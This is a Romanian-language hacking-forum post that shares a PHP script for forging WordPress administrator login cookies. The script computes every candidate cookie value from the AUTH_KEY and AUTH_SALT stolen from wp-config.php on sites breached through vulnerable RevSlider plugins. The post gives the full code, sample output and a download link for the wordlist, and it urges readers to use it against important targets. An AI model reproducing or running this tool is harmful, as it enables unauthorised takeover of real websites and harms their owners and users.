Oamenii sunt indignati de faptul ca au gasit zeci de mii de Wordpress-uri cu versiuni de RevSlider vulnerabile si ca n-au ce face cu informatiile din wp-config.php(pentru ca n-au acces phpmyadmin, ori pentru ca sysadminii sunt atat de nesimtiti incat nu dau drepturi de citire in tot sistemul). Ca sa va indignez si mai mult, am scris un script PHP care calculeaza toate valorile posibile pentru cookie-ul de autentificare, pe baza AUTH_KEY-ului si AUTH_SALT-ului prezente in wp-config. Scriptul va returna 16.785.472 rezultate. Dureaza cam 1-2 saptamani de brute(cu 15-30 req/s). Daca targetati ceva important, se merita. In sursa trebuie sa modificati $user, $secret_key, $salt, $wp_url. <?php //4 hackers by bobbytables @ rstforums.com $user = 'admin'; $secret_key = '4mSa>lH#T{,T)J!Q[F[F|1tvKRP=r3T|qTwgQN#JXDD%&4$=1x9<R1-Dj2u^:Y+r'; $salt = 'VDm[*6!ba}8=D}|eh7WRZxIItH+!4,1m^jD8qz)%d^y.#z6^~`&qY+b7nxa2&Str'; $wp_url = 'http://rstforums.com'; $chunks = file('4char.txt'); $timestamp = '1430784000'; echo "Cookie name: wordpress_" . md5($wp_url) . "\n"; echo "All possible cookie values: " . "\n"; foreach($chunks as $pass) echo $user . '|' . $timestamp . '|' . hash_hmac('md5', $user . '|' . $timestamp, hash_hmac('md5', $user . $pass . '|' . $timestamp, $secret_key . $salt)) . "\n"; ?> php wp_cookiebrute.php Cookie name: wordpress_78145c8b444408b7c6139e28b09b7814 All possible cookie values: admin|1430784000|7c50ff16b95684127d7011468e202bc7 admin|1430784000|5edebfcb996c6032740554a2f3f24de5 etc. Probabil o sa va crape sistemul, asa ca faceti si voi chunk-uri din fisierul 4char.txt din arhiva. Download https://www.wetransfer.com/downloads/cc76c17d29ee406b047c1e6ab6ff8c6520140907182229/b8c10007d9622e900479eb04647bc37d20140907182229/dd7d94 Have fun!